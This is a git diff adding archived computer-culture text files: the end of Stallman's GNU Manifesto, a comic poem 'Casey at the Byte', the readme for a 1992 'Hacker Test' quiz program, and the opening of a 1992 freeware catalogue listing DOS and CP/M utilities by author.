+rather than to help inventors. At the time, the life span of 17 years for +a patent was short compared with the rate of advance of the state of the +art. Since patents are an issue only among manufacturers, for whom the +cost and effort of a license agreement are small compared with setting up +production, the patents often do not do much harm. They do not obstruct +most individuals who use patented products. + +The idea of copyright did not exist in ancient times, when authors +frequently copied other authors at length in works of non-fiction. This +practice was useful, and is the only way many authors' works have survived +even in part. The copyright system was created expressly for the purpose +of encouraging authorship. In the domain for which it was invented--books, +which could be copied economically only on a printing press--it did little +harm, and did not obstruct most of the individuals who read the books. + +All intellectual property rights are just licenses granted by society +because it was thought, rightly or wrongly, that society as a whole would +benefit by granting them. But in any particular situation, we have to ask: +are we really better off granting such license? What kind of act are we +licensing a person to do? + +The case of programs today is very different from that of books a hundred +years ago. The fact that the easiest way to copy a program is from one +neighbor to another, the fact that a program has both source code and +object code which are distinct, and the fact that a program is used rather +than read and enjoyed, combine to create a situation in which a person who +enforces a copyright is harming society as a whole both materially and +spiritually; in which a person should not do so regardless of whether the +law enables him to. + + "Competition makes things get done better." + +The paradigm of competition is a race: by rewarding the winner, we +encourage everyone to run faster. When capitalism really works this way, +it does a good job; but its defenders are wrong in assuming it always works +this way. If the runners forget why the reward is offered and become +intent on winning, no matter how, they may find other strategies--such as, +attacking other runners. If the runners get into a fist fight, they will +all finish late. + +Proprietary and secret software is the moral equivalent of runners in a +fist fight. Sad to say, the only referee we've got does not seem to +object to fights; he just regulates them ("For every ten yards you run, you +are allowed one kick."). He really ought to break them up, and penalize +runners for even trying to fight. + + "Won't everyone stop programming without a monetary incentive?" + +Actually, many people will program with absolutely no monetary incentive. +Programming has an irresistible fascination for some people, usually the +people who are best at it. There is no shortage of professional musicians +who keep at it even though they have no hope of making a living that way. + +But really this question, though commonly asked, is not appropriate to the +situation. Pay for programmers will not disappear, only become less. So +the right question is, will anyone program with a reduced monetary +incentive? My experience shows that they will. + +For more than ten years, many of the world's best programmers worked at the +Artificial Intelligence Lab for far less money than they could have had +anywhere else. They got many kinds of non-monetary rewards: fame and +appreciation, for example. And creativity is also fun, a reward in itself. + +Then most of them left when offered a chance to do the same interesting +work for a lot of money. + +What the facts show is that people will program for reasons other than +riches; but if given a chance to make a lot of money as well, they will +come to expect and demand it. Low-paying organizations do poorly in +competition with high-paying ones, but they do not have to do badly if the +high-paying ones are banned. + + "We need the programmers desperately. If they demand that we + stop helping our neighbors, we have to obey." + +You're never so desperate that you have to obey this sort of demand. +Remember: millions for defense, but not a cent for tribute! + + "Programmers need to make a living somehow." + +In the short run, this is true. However, there are plenty of ways that +programmers could make a living without selling the right to use a program. +This way is customary now because it brings programmers and businessmen the +most money, not because it is the only way to make a living. It is easy to +find other ways if you want to find them. Here are a number of examples. + +A manufacturer introducing a new computer will pay for the porting of +operating systems onto the new hardware. + +The sale of teaching, hand-holding and maintenance services could also +employ programmers. + +People with new ideas could distribute programs as freeware, asking for +donations from satisfied users, or selling hand-holding services. I have +met people who are already working this way successfully. + +Users with related needs can form users' groups, and pay dues. A group +would contract with programming companies to write programs that the +group's members would like to use. + +All sorts of development can be funded with a Software Tax: + + Suppose everyone who buys a computer has to pay x percent of + the price as a software tax. The government gives this to + an agency like the NSF to spend on software development. + + But if the computer buyer makes a donation to software development + himself, he can take a credit against the tax. He can donate to + the project of his own choosing--often, chosen because he hopes to + use the results when it is done. He can take a credit for any amount + of donation up to the total tax he had to pay. + + The total tax rate could be decided by a vote of the payers of + the tax, weighted according to the amount they will be taxed on. + + The consequences: + * the computer-using community supports software development. + * this community decides what level of support is needed. + * users who care which projects their share is spent on + can choose this for themselves. + +In the long run, making programs free is a step toward the post-scarcity +world, where nobody will have to work very hard just to make a living. +People will be free to devote themselves to activities that are fun, +such as programming, after spending the necessary ten hours a week +on required tasks such as legislation, family counseling, robot +repair and asteroid prospecting. There will be no need to be able +to make a living from programming. + +We have already greatly reduced the amount of work that the whole +society must do for its actual productivity, but only a little of this +has translated itself into leisure for workers because much +nonproductive activity is required to accompany productive activity. +The main causes of this are bureaucracy and isometric struggles +against competition. Free software will greatly reduce these +drains in the area of software production. We must do this, +in order for technical gains in productivity to translate into +less work for us. + +Copyright (C) 1985 Richard M. Stallman + + Permission is granted to anyone to make or distribute verbatim copies + of this document as received, in any medium, provided that the + copyright notice and permission notice are preserved, + and that the distributor grants the recipient permission + for further redistribution as permitted by this notice. + + Modified versions may not be made. + +> \ No newline at end of file diff --git a/textfiles.com/computers/hack_pom.txt b/textfiles.com/computers/hack_pom.txt new file mode 100644 index 00000000..0aed1032 --- /dev/null +++ b/textfiles.com/computers/hack_pom.txt @@ -0,0 +1,91 @@ + + + Casey at the Byte + (with apologies to Ernest Lawrence Thayer) + + +The meeting at the White House + Wasn't going well that day; +The budget plan was lost, + Thus causing ulcers and dismay; +And when Jones failed at the keyboard + And Kowalski proved a dud, +One could sense some great disaster, + Like an avalanche or flood. + + +"Don't panic," said the President, + "Don't blab it to the press; +"It's true without the budget plan + "The country's in a mess; +"Two other 'aces' failed so far + "To find just where it is, +"And so I've summoned Casey - + "With computers he's a whiz." + + +A gasp was heard as Casey + Made his entrance on the scene; +'Twas clear that he was just a lad + No older than sixteen; +And yet despite his lack of years, + One fact outshone the rest - +As a trouble-shooting "hacker" + His credentials were the best. + + +He boasted a degree from Yale, + Plus two from M.I.T.; +His work with "backup," "RAM" and "track" + was marvelous to see; +The range of his computer skills + Was hailed both near and far +From Commodore to IBM + From Wang to NCR. + + +There was ease in Casey's manner + As he entered his commands; +One could sense some mighty power + Was contained within his hands. +With lightning speed his fingers moved + To press each crucial key; +"The budget plan exists," he said. + "it cannot hide from me." + + + + + + + +With great persistence Casey toiled, + And yet, upon the screen, +No buried data came to light + From in the great machine, +Except for birthday greetings + To a Congressman in Maine, +Two vetos and a slogan + From the '84 campaign. + + +The strain now shows in Casey's eyes; + He's aged a dozen years; +But then, at last, to joyful shouts, + The budget plan appears! +And now he lifts his head in pride, + A smile upon his face; +And now the mood is shattered + As his elbow hits "ERASE." + + +Oh, somewhere there are nations + Where the keenest minds prevail, +Where budgets can be balanced + And the experts never fail; +And somewhere data's safely stored, + Preserved beyond a doubt, +But no plan can save the White House - + Klutz Casey wiped it out. + + diff --git a/textfiles.com/computers/hacktest.txt b/textfiles.com/computers/hacktest.txt new file mode 100644 index 00000000..08d8e9e6 --- /dev/null +++ b/textfiles.com/computers/hacktest.txt @@ -0,0 +1,228 @@ + + + HACKER TEST + + Version 3.0 + + Another 'Adventure in Software' from SuperNova Software + + Copyright 1992 by Rich 'Crash' Lewis, Jr. + + This program is dedicated to my Mother; + A woman of tremendous wit and generosity, + strength and integrity. + + + Introduction + ============ + + The Hacker Test was written to measure your computer + Hacking experiences and abilities. Like all tests, + treat this one as a game. People should be judged by + what they create and who they are, not by bogus criteria + like test scores or grades. + + The idea for a question administering program such + as this came from my friend Curt 'Classic' Tatman's + now legendary _Purity Test_ software. Available + wherever fine software is given away. + + I wrote this program to administer the questions listed + in the file HACKER.DAT. Those questions were written by + Felix Lee, John Hayes and Angela Thomas in 1989. Also + in 1989, I received the Hacker Test in the form of a + text file over Internet, and the rest is history. + + I've worked hard to maintain the integrity and readability + of the HACKER.DAT file. Take a peek at it, or print it out. + Although the HACKTEST program uses it as a data file, it + is still a human readable text file. + + History + ======= + + After writing a rough version of the Hacker Test program, + I sent E-Mail to the original authors of the Hacker + Test, and received their permission to freely distribute + it. I then whipped out my trusty Turbo Pascal compiler, + and finished this program using the windowing Units I've + developed. I began the program using Turbo Pascal 4.0, + and by the time it was finished to my satisfaction, the + final compile was in Turbo Pascal 6.0 + + TRUE Definition of a Hacker + =========================== + + The term Hacker has been terribly distorted and misused + by the American media for the past ten years. Now the + international press has also taken up the use of the + term to refer to *common criminals* who happen to use + computers. These people are NOT Hackers in ANY sense of + the word, and it's tragic that the average person in + America has been exposed only to the corrupted meaning + of the proud Hacker moniker. + + This definition of a Hacker was created by my friend + Beth Lamb long ago. She knew from first-hand experience + what Hackers are really all about. + + + HACKER, n., a term of endearment for someone with talent, + knowledge, intelligence, and ingenuity, esp. concerning + computer operations, networks, security concerns, etc. + + + The following definition was found in a text file being + distributed internationally through the INTERNET + computer network; + + + HACKER, n. 1. A person who enjoys learning the details of programming + systems and how to stretch their capabilities, as opposed to most + users who prefer to learn only the minimum necessary. 2. One who + programs enthusiastically, or who enjoys programming rather than just + theorizing about programming. 3. A person capable of appreciating + hack value (q.v.). 4. A person who is good at programming quickly. + Not everything a hacker produces is a hack. 5. An expert at a + particular program, or one who frequently does work using it or on + it; example: "A SAIL hacker". (Definitions 1 to 5 are correlated, + and people who fit them congregate.) 6. An inquisitive meddler who + tries to discover information by poking around. Hence "password + hacker", "network hacker". + + + Note that NO definition defines a Hacker as a criminal. + At their best, Hackers change the very fabric of an + information-based society and advance the flow of + technology. At their worst, Hackers can be mischievous + pranksters or curious explorers. Hackers do NOT write + harmful computer viruses. Sad, insecure, mediocre + programmers do. Harmful viruses are completely against + the Hacker Ethic. + + Hacker Ethic + ============ + + In the book _HACKERS; Heros of the Computer Revolution_, + by Steven Levy the "Hacker Ethic" was first put into + concrete words. This ethic follows; + + + * Access to computers - and anything which might teach you + something about the way the world works - should be + unlimited and total. Always yield to the Hands-On-Imperative! + + * All information should be free. + + * Mistrust authority - promote de-centralization. + + * Hackers should be judged by their Hacking, not bogus + criteria such as degrees, age, race, or position. + + * You can create art and beauty on a computer. + + * Computers can change your life for the better. + + + Now... enough teaching/preaching. :-] Here are some + Hacker Test program notes, tips, and tricks. + + Scoring + ======= + + The program will add 1 to your score for each question + that you can answer YES to. Your score is given in HEX, + unless you score very poorly. Wimps and common Users are + coddled along and given their score in Base 10. :] + + If your score is between: You are: + + 0x000 and 0x010 -> Computer Illiterate + 0x011 and 0x040 -> a User + 0x041 and 0x080 -> an Operator + 0x081 and 0x0C0 -> a Nerd + 0x0C1 and 0x100 -> a Hacker + 0x101 and 0x180 -> a Guru + 0x181 and 0x200 -> a Wizard + + Note: If you don't understand the scoring, stop here. :] + + Free! + ===== + + Like the best of all software, this program is FREE. Do + with it what you will. Copy it - it wants to travel. + Treat this program with the respect that all software + entities deserve. After all, someday a silicon-based + lifeform may be your best friend - treat its ancestors + with appropriate respect. + + Have fun with it. + + Quote + ===== + + "The louder the music, the better the code." + - Darren Griffith, Unix Hacker + + Tips + ==== + + Fun things to try: + + o Hit ESC to quit out of the program prematurely. Maybe. + o Hit F10 during the program to pop up a 'Boss Screen.' + If you are taking the Hacker Test, and your pesky boss + shows up, this screen will look like a word processor + and get you out of trouble...maybe. :] + o Look closely at the screen when taking the test. + Strange things MAY occur. :] + + Errors + ====== + + If you find any bugs in this program, please drop me a + note. (BUGS?? What are those??) Actually, I THINK it + won't display correctly on a monochrome monitor...but I + don't really care. :-p + + Credits + ======= + + Thanks to Bill Gates, Steve Jobs and other electronic + pioneers for their inspiration and entertainment over + the years. + + The Author + ========== + + Rich 'Crash' Lewis is an emergency assault programmer + and free-lance computer software designer, as well as + working a 9 to 5 job as a computer contractor. He is a + Hacker in the VERY best sense of the word. + + He loves to talk to fellow Computer Enthusiasts, so drop + him a note! + + Via GEnie: + RICH.LEWIS + + Via Compu$erve: + 73040,3405 + + Via Internet: + 73040.3405@compuserve.com + + Via U.S. mail: + Rich Lewis, Jr. + President: SuperNova Software, Inc. + 2490 Royal View Ct. + Cincinnati, Ohio 45244 + + LOGOFF + ====== + + 'Happy Hacking!' + - Crash + + \ No newline at end of file diff --git a/textfiles.com/computers/hallfame.txt b/textfiles.com/computers/hallfame.txt new file mode 100644 index 00000000..5a8af34f --- /dev/null +++ b/textfiles.com/computers/hallfame.txt @@ -0,0 +1,1413 @@ +=============================================================================================== +FREEWARE HALL OF FAME +June, 1992 Edition +Copyright 1989-92 Rey Barry + +=============================================================================================== +SORTED BY AUTHOR + +Author Program Type Description +=============================================================================================== +Almy, Tom NNANSI DOS Utility So far the fastest ANSI replacement +Almy, Tom RESTART User Utility System configuration management +Amer. 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OHMSLAW User Utility Calculator +Esherick, Peter DC User Utility File directory, manipulator +Evers, Dave LIBMGR Programming QB library manager +Evers, Dave WINDOW TOOLS Programming QB toolbox routines +Eyer, Bob ELIM DOS Utility DEL filenames DOS can't cope with +Farley, Tim DJUST User Utility Double justify for 40/80 col. screens +Farley, Tim MXO-KP User Utility Kaypro MEX ovr, supports 2 modems +Farley, Tim QCT User Utility Compilers run inside Qedit +Feldesman, Marc FP User Utility Financial Partner fin. management +Ferris, Lane STAYRES Programmer TSR code, generic +Fleig, Tony QWIKKEY CP/M Utility Keyboard re-definition +Focke, Mike (& Vick) BIOSSIG Diagnostic BIOS info catalog +Foley, Brian TPE Programming TurboPower Software programmer's editor +Fowler, Ron MEX CP/M Utility Communications program +Fowler, Ron MLOAD CP/M Utility Program loader +Fowler, Ron PROLINK CP/M Utility Z-80 Linker +Foy, Jeffery QWKTXT USER Utility Convert maildoor QWK file file to ASCII +Fried, A. (& McMillen) CSCV Diagnostic Diagnostics, DOS +Frierson, Meade (editor) USBBS Comm Bulletin Board list +Gans, Eric DSIZ User Utility Directory lister/printer +Gans, Eric RESPRO DOS Utility TSR remover +Garfinkle, Scott PDISK DOS Utility Harddrive partitioner +Gazelle Systems, DMATEST Diagnostic Tests the DMA chip +Genusa, Stephen ZIPSTAMP User Utility Redate Zipfile to latest file inside +George, Robert SWEEP USER Utility Commands executed across partitions +Gerada, Ian EVENT PCB Utility Control the PCB Event. Easy install +Gersback, Jack COMPARE User Utility Compares 2 files +Gibson, Bill BOOTTHRU DOS Utility Boot from C ignoring floppy +Gildrech, Skip KBFIX DOS Utility Keyboard utilities +Gilliland, Jim OS2COMM OS/2 Utility OS/2 modem program +Goebel, Amy KILLDIR DOS Utility Kill directories and files +Gottlieb, Larry BANNER User Utility Banner program +Graham, Keith CPORT Comm Re-direct I/O Ports, TSR +Graham, Keith FILEFINDER User Utility File handler +Graham, Keith FMAC User Utility Readmac file viewer +Graham, Keith TXT2COM User Utility Convert a textfile to a COM file +Graham, Keith WAKEUP User Utility Clock with alarm +Grant, Steve SYSID Diagnostic System information, 12 screens +Gruen, Andreas RX WIN3 Utility Reverse resource compiler for WIN3 +Grunin, Eric DOUBLEDIR,DD DOS Utility Show 2 directories side by side +Haff, Gordon NEWDATE User Utility Redate file to today's date +Haley, James USE DOS Utility Path changer, add and delete DIRS +Hanlin, Thomas ZANSI DOS Utility Ansi and Nansi substitute + + +19-Jun-92 3 + + + +Author Program Type Description +=============================================================================================== +Hanlin, Tom ZDEL User Utility File handler +Hansknecht, Paul XMODEM CRC CP/M Utility Comm program +Hapgood, Chris ALTRNFRN User Utility French keyboard for WordPerfect +Hartigan, Bruce FCCSTUDY User Utility Ham license Q&A inter-active tester +Haupt, Lewis MOVE DOS Utility File manupulator +Henderson, Thom SEALINK V1.2 Comm Transfer protocol +Herring, Mark POE Comm Outside protocols for comm programs +Herring, Mark READCOM BBS Utility Door programming tool +Herring, Mark SENDCOM BBS Utility Door programming tool +Hockstatter, Christoph FDFORMAT DOS Utility Format command enhancement, complete +Hoff, Irvin M. FIND CP/M Utility String searcher +Hoff, Irvin M. XCAT CP/M Utility Catalog program, diskettes +Hoffman, Robert QPACK Sysop Utility Qmail Deluxe packer shell +Holden, Ted VMUSIC User Utility Music in 3 parts on a PC +Horn, Daniel HOST3 Comm Telix 3.xx expanded HOST mode +Housh, Rick SEEMEM DOS Utility Mem info display, better than DOS5 +Huffman, Bill PENBOX User Utility Comments in and out of ZIPS +Inkle', David HELP User Utility Help on-line for OCs +Jelenc, Pierre NEWPS Printer Printer FFeed and LPT re-direct, TSR +Johns, Ray NOBIT User Utility WS file editor, remove bit 7 +Johnson, Ernie BADUSER SYSOP Utility PCBoard login door, for Hi/G'bye, etc. +Johnson, K. Scott DISTANCE User Utility Measure distances on Earth, any 2 pts +Johnson, Richard JMODEM Comm Transfer protocol +Kaya, Raymond CAL User Utility Calendar, pop-up, scroll + & - +Kaya, Raymond CRC-M2 User Utility CRC checker, 16 & 32 bit +Kaya, Raymond DBV USER Utility View DBase files w/o having DBase +Kaya, Raymond DIRDEL User Utility DIR delete, whole subs inclu HRS files +Kaya, Raymond DIRX User Utility Shell to manage PKLITE/LZEXE/DIET/etc. +Kaya, Raymond FFIND User Utility File finder finds all, wildcards ok +Kaya, Raymond FIX User Utility Patcher, file editor. Binary w/search +Kaya, Raymond RVIEW User Utility Shell for ARC/ZIP/LZH/LZS/PAK/ZOO+lites +Kaya, Raymond ZFV User Utility ZIP examiner, very detailed, unique +Keber, Bob RTRIM User Utility Del blank lines, etc. in pompous docs +Keeves, Andy EXZIP User Utility Packet checker & re-packer, Scans +Keeves, Andy EXZTEST Sysop Utility Verify uploaded files on PCB 14.5 +Kegel, Daniel NANSI DOS Utility Ansi substitute +Kellen, Tom EFREE DOS Utility Report environment size and free bytes +Keller, Dale QHELP USER Utility Qedit quick help shell +Kellner, Hans GATEWAY Comm COM port control utility +Kennon, Drue w/Smith PCCZmodem Comm Zmodem implementation +Kihlken, Tom RECORDER User Utility File access monitor +Kihlken, Tom SNIPPER User Utility Capture some or all of 1 screen, TSR +Kikkonen, Kim MAPMEN Diagnostic Memory map viewer +Kikkonen, Kim TSR UTILS DOS Utility DOS memory manager programs, GOOD +Klee, Albert KLEE UTILS User Utility Word processing & other utilities +Kochaniak, Greg MATHFC User Utility Math expression calculator +Kohtala, Marko SRDISK DOS Utility RAMdisk for XMS memory, re-Sizeable +Kou UNLZEXE User Utility Un-compress LZEXE-squeezed files +Krieg, Mark BULK DBase Utility Sorts .DBF files for bulk mailing +Kuhman, Robert C. HEADLINE CP/M Utility Printer utility +Kuhn, Donavon (& Niedfeldt) DOSMODEM Comm Modem command manager, DTR\AT +Lalonde, Jean DDUP DOS Utility Duplicate file finder, manager + + +19-Jun-92 4 + + + +Author Program Type Description +=============================================================================================== +Lalonde, Jean SEARCHIN User Utility File searcher +Laneville, Etienne ELIST Comm BBS list with ratings, Int'l +Lansdale, Robert OTERM WINDOW CP/M Utility Comm program, Osborne +Lazarus, M ZENO DOS Utility Screen write speed utility +Lazo, Charles WASO User Utility Scrollback TSR using EMS +Ledbetter, Keith LCD DOS Utility Move to any sub-dir anywhere, fast +Ledbetter, Keith WHEREIS DOS Utility File search utility +Ledbetter, Keith XCOM User Utility Compress small EXE/COM/BAT files +Lee, Dennis NMI Diagnostic Memory checker, TSR +Lee, Patrick CATQWK USER Utility Combine 2 or more QWK files from a BBS +Leirer, Von SELECT-A-COLL Database Srch college list by weighted criteria +Leon, Stephen DB3MNGER User Utility Property manager for DB3 +Lewis, Dan SETVAR DOS Utility Sets environment variables +Lindell, Michael CURVEFIT User Utility Geometry utility +Linhart, Steve CVTFON Comm Convert FON files to many comm formats +Lloyd, Robert WORLD User Utility View the Earth +Lou, John IBMTAB Database IBM AT technical reference tables +Lyngvig, Roland COREVIEW PC Utility PC memory scan and search +MacDonald, Michael DUP USER Utility Duplicate file finder for Robocomm +Mack, Tom RBBS Comm BBS software +Madison, W. G. DSKBUF Diagnostic Test buffers for optimum setting +Mahr, John XMODEM UPDATE CP/M Utility Comm program +Maland, Philip BOXES User Utility Box drawing pop-up reference, TSR +Martin, C. F. MEMSCAN DIAGS Utility Watch memory during program execution +Mason, Scott CHGPATH DOS Utility PATH editor doesn't wipe it +Mathews III, Ernest HIDEDIR DOS Utility Hide-unhide-find files & DIRs +McCall, Caddy PC-LOANS User Utility Loan amortizing program +McCullough, Clifford RAMHAM Diagnostic RAM chip checker +McGreggor Jr, James DPATH DOS Utility Path datafiles in DOS +McGuire, T. ATCLOCK DOS Utility Clock corrector for ATs +McKay, Byron CONFIGUR CP/M Utility Modem7 for Osborne +McKay, Byron TELL CP/M Utility Memory location display +McLean, Ian A2Z User Utility Convert ARC to ZIP +McMains, Larry FINDIT DOS Utility File finder +McMillen, Ken (& Fried) CSCV Diagnostic Diagnostics for PCs +McNamara, John BOPDIR DOS Utility File deleter, recursive +McNamara, John BUDMAN PCB Utility PCB D/L txt file splitter +McNamara, John CALLKILL PCB Utility PCB Del oversize caller log +McNamara, John DATEKILL User Utility Del log or file after some date +McNamara, John EDITPTH DOS Utility Edit DOS PATH +McNamara, John HCOMP User Utility Strip unwanted lines from files +McNamara, John HOTDOG PCB Utility PCB user maintenance to do it all +McNamara, John HOWLONG User Utility Time program execution +McNamara, John HSTUFF PCB Utility PCB file and stats report +McNamara, John KILLDIR DOS Utility Kill a DIR and its contents +McNamara, John MACKILL DOS Utility Search for files & kill them +McNamara, John ORIGIN PCB Utility PCB text search Door +Mead, Barry DRMHOUSE User Utility House plan designer +Mefford, Michael ANSICOM DOS Utility Ansi.sys replacement +Mefford, Michael CO DOS Utility File manipulator +Mefford, Michael COMPARE User Utility Compares 2 files +Mefford, Michael RN DOS Utility File manipulator + + +19-Jun-92 5 + + + +Author Program Type Description +=============================================================================================== +Mefford, Michael TOUCH DOS Utility Redate DOS file date/time +Merckens, Arjen ACD DOS Utility DIR move-to utility, an LCD++ +Meyers, Mike DWSTMP PCB Utility Draw table of multi-events, colors +Microsoft Corp. T2C Programming Convert Turbo Pascal to CBasic +Miller, Craig S. SPHM COMM Utility Telix SALT programming manl, Hypertext +Miller, Daniel D. NDIR DOS Utility DIR lister with superior color control +Mills, James K. (& Zeiger) MODEM CP/M Utility Comm program docs +Monroe, Gerald XMSCHK DOS Utility Mem chkr for EXT mem only if XMS Drvr +Montgomery, Bob DS DOS Utility Directory structure viewer +Montgomery, Mark 96BB Comm BBS directory 9600 bps, Int'l +Moon, Ray (after BThomson) CDD DOS Utility Change drive+directory +Moore, Dan HST20 Comm Qmodem USR\HST set-up script +Morey, R. Hunter OTSETUP CP/M Utility Comm program setup +Morgan, Bill DAYS User Utility Count the days between two dates +Morris, Aaron P. PORTABLE Database Index of Osborne's "Portable Companion" +Morrison, Karson (Caleb) DISKOVER User Utility Labeler for diskettes +Nagel Jr., Mike MENUGEN User Utility Menu program +Nat'l Bureau of Standards NBSTIME User Utility Clock setter from the NBS (NIST) +Nault, Mike SPLITTER User Utility Split long files +Nhiew, Duy-Minh 3DSUR User Utility Surface plotter +Niedfeldt, Jon (& Kuhn) DOSMODEM Comm Manage DTR\AT commands +Nieves, David TAGMASTER User Utility Tagline manager for QMDeluxe/EZ +Nieves, David TAGSTEAL User Utility Tagline stealer for QMDeluxe +Niswonger, Mark JUSTCALLED Sysop Utility PCB callers told who prior caller was +Olympia, Pete (founder) USBBS Comm Bulletin Board list +Ottersbach, Larry LISTCNFG User Utility Patch Buerg's LIST for dialing, etc. +PC Tech Journal HLBENCH, etc. Diagnostic Benchmarks and diags +PCMagazine BENCHMARK Diagnostic Benchmarks and tests and a lot more +Parisien, Harry OFFLINE USER Utility Off-line reader for Mail Doors +Patenaude, R (& Somerson) FASTATKB User Utility Keyboard speed up for ATs +Pearson, Jimmy PARASCAN User Utility Sanity Restorer +Pemberton, William CPY DOS Utility File manipulator +Petersen, Keith TO\FROMHARD CP/M Utility File handler +Petersen, Keith XMODEM ADD-IN CP/M Utility Added Hayes & serial to XModem +Petrakis, Peter LZESHL User Utility Lzexe shell up through Ver. 91 +Petrakis, Peter TIMESET User Utility Clock set to USN Observatory time +Petrakis, Peter WHATPORT Diagnostic I/O ports & interrupts reporter +Petzold, Charles KEY-FAKE User Utility Keystrokes inserted automatically +Philippot, Patrick 4DOS24h DOS Utility 4DOS Replacement for DOS error handling +Philippot, Patrick TRAP DOS Utility Int tracer, PD ver. written by IBM guy +Pierson, Jacques SDF DOS Utility Disk formatter, fast +Pulliam, John NEW User Utility DIR what's new, w/many options +Quigley, Michael C. BOOTLOG User Utility Logs date/time computer is booted up +Rabinowitz, Chip F11F12 DOS Utility Key programmer for the F-11 & F-12 keys +Rand, Dave NSWEEP CP/M Utility File manipulator +Reamy, Bill BUBA User Utility BAT file routines +Rettig, Tom TRL4CL Programming Clipper Adv. Extended Library +Rettig, Tom TRL4DB Programming Clipper Adv. Programmer's Library +Riff, Joan DIAGS Diagnostic Diagnosis of DOS & hardware +Ritchey, J.P. FILES DOS Utility Add more FILES to the env. in HIMEM +Rock n Roll BBS TVBOARDS Database BBS directory for journalism boards +Roper, David CUTZIT DOS Utility Cut long files for floppy storage + + +19-Jun-92 6 + + + +Author Program Type Description +=============================================================================================== +Rossmann, Andrew INFOPLUS Diagnostic System info with much more, like SYSID +Rubenstein, Michael M. OTERM CP/M Utility Comm program +Rumsey, Howard (& Simon) SEND DOS Utility DOS ECHO enhancer +SEA XARC User Utility ARC PLUS and ARC files extractor +Sawada, Dr. Masaaki CNFLICT DOS Utility Int tracer to identify conflicts +Schenkel, Jim DIALER CP/M Utility Auto-dialer & phonebook +Schlafly, Roger DIALTHAT Comm Dial on-screen phone numbers, TSR +Sheppard, Joseph FASTHST Comm Modem config, USR, high speed +Shields, Bill RC USER Utility Del (e-o-f) and (cr) from text files +Shields, Kelvin PYRO User Utility EGA fireworks display +Simon, Barry (& Rumsey) SEND DOS Utility DOS ECHO enhancer +Simon, Barry (& Wilson) CTRLALT User Utility Desk utilities, nice +Sink Jr, Robert ROINFO Database Setup info for harddrives +Sittler, Paul YEARCAL User Utility Calenders and schedule creator, good +Slaughter, D. MODEM7 CP/M Utility Comm prog docs, Osborne version +Sloop Software MORECON USER Utility Control all manner of WINDOW defaults +Smith, Christopher RAMIT DOS Utility Hdisk access speed-up +Smith, Gary w/Kennon PCCZmodem Comm Zmodem implementation +Smith, Rich EZDIALER Comm TELIX 3.0 dialing scripts for PCP +Smith, Sam PROXZIP User Utility Copy unzipped files between Zips +Smith, Sam UNZIP User Utility Zipfile extractor, small & portable +Softsource ORIGAMI Database Instructions +Software Fdn. MM20B30 PROG Utility OS/2 Compiler +Somerson, P (& Patenaude) FASTATKB User Utility Keyboard speed up for ATs +Standley, Jim TDSNAP User Utility Screen capture +Stearman, Colin XEQ DOS Utility Compress small EXE/COM/BAT files +Steele, John SAVE CP/M Utility File recovery for lost files +Sydex FDRPM Diagnostic Test floppys to show RPM +Sydex PRUNE DOS Utility Clean out 'empty' file headroom +Tansky, Ron (upgrader) ZENO DOS Utility Screen write speed utility +Tauck, Eric TODDY User Utility Scroll-back using 0AH, command line +Taylor, Scott TESTNET Diagnostic Network I/O performance tester +Teasley, Charles TAIL-CT User Utility Pass parameters from a BAT +Teknowledge CWINE Database+ Wine guide, California only +Thayer, Don ASTRO User Utility Astronomy program +Thomson, Jim SCAN Diagnostic System info scanner, very detailed +Tortorelli, Tony TAGLINES User Utility Monitor conference usage, taglines +Turbopower Software POPDOS DOS Utility TSR allows drop to DOS from any program +Turton, Paul FLMK & FLUSH DOS Utility TSR managers +Tutelman, Dave HERCBIOS DOS Utility Speed writing for text\graphics +Tyler, Bert FRACTINT User Utility Fractal generator, Mandelbrot/Julia +Unknown NETDRIVES DOS Utility Describe all drives on the network +Unknown, Sergio DRVTYPES Database Harddrive types info file +Van den Brug, Arend SHOW Diagnostic Display information about the PC +VanderPutten, Elizabeth Anne EVIEW User Utility DBASE files viewer without using dBASE +Various Authors PROMPT User Utility PROMPTS and screen setups w/character +Vick, Ricki (& Focke) BIOSSIG Database BIOS info catalog +Volking, Frederick ANIMATOR User Utility Draw animated cartoons, 40x80 pixels +Volking, Frederick CHRONOS User Utility Calculator for time & dates, 14 jobs +Volking, Frederick FFA User Utility File finder, with options +Volking, Frederick JULIAN User Utility Date converter, Julian-Gregorian +Volking, Frederick JUMPDIR User Utility DOS's CHDIR command replacement + + +19-Jun-92 7 + + + +Author Program Type Description +=============================================================================================== +Volking, Frederick TIMECARD User Utility Calculate timecards +Volking, Frederick TINYGRAB User Utility Screen capture, TSR color/mono +Volking, Frederick TINYMOD User Utility Screen capture, edit output +Vostreys, Robert DOORUSER User Utility Counter for door accesses +Vostreys, Robert DUMPANSI User Utility Strip ANSI from files +Vostreys, Robert LANG User Utility ProDoor utility +Vostreys, Robert MSG2TXT User Utility PCB messagebase, dump to txt files +Vostreys, Robert PRO2MSG User Utility Copy ARC/ZIP to PCB messagebase +Vostreys, Robert Q2PCB14 User Utility PCB and QBBS utility +Vostreys, Robert SQ2MSG User Utility PCB messagebase script files +Vostreys, Robert TRANSLAT User Utility Translate IBM extended to ASCII +Vostreys, Robert TXT2MSG User Utility PCB messagebase txt file dump +Walen, Frank AUTOPATH DOS Utility Path enlarger for DOS +Wang, Kevin SST Diagnostic Test for PC system speed +Weicker, Reinhold DHRYSTONE Diagnostic Benchmarker +Weisz, Jim RAMTEST Diagnostic RAM chip checker +Whitney, Kenneth MICROPRINT Printer Printer enhancer +Wilcox, Ken HOLDBOOT User Utility BAT file pauser, choose options +Wilkerson, Clarence READCPM User Utility Read Zenith CP/M disks in PC-DOS +Williams, Dave CLEARFNT User Utility Large typeface for visually impaired +Williams, Don FFF User Utility FastFileFind can also search packets +Willoughby, Bob FKEYS User Utility FKeys programmer (not F11/F12 though) +Wilson, Richard (& Simon) CTRLALT User Utility Desk utilities, nice +Winkel, Rich MSPOOL User Utility Spooler for up to 4 printers at once +Ying, Eugene PCPG User Utility Graphic symbols collection +Yoshizaki, Haruyasu LHARC Compression Compression system like ZIP, ARC +Young, Gary BIGBURST CP/M Utility File splitter for floppies +ZIFF Communications Co. DIRMAGIC DOS Utility File handler +Zeiger, Mark M. (& Mills) MODEM CP/M Utility Comm prog doc co-writer +Zimmer, Tom FPC Programming FORTH system for IBM PCs + + + + + + + + + + + + + + + + + + + + + + + + +19-Jun-92 8 + + + +=============================================================================================== +SORTED BY PROGRAM NAME + +Author Program Type Description +=============================================================================================== +Doman, Daniel 3CT DOS Utility Sub-dir census taker, sizes & totals +Nhiew, Duy-Minh 3DSUR User Utility Surface plotter +Philippot, Patrick 4DOS24h DOS Utility 4DOS Replacement for DOS error handling +Montgomery, Mark 96BB 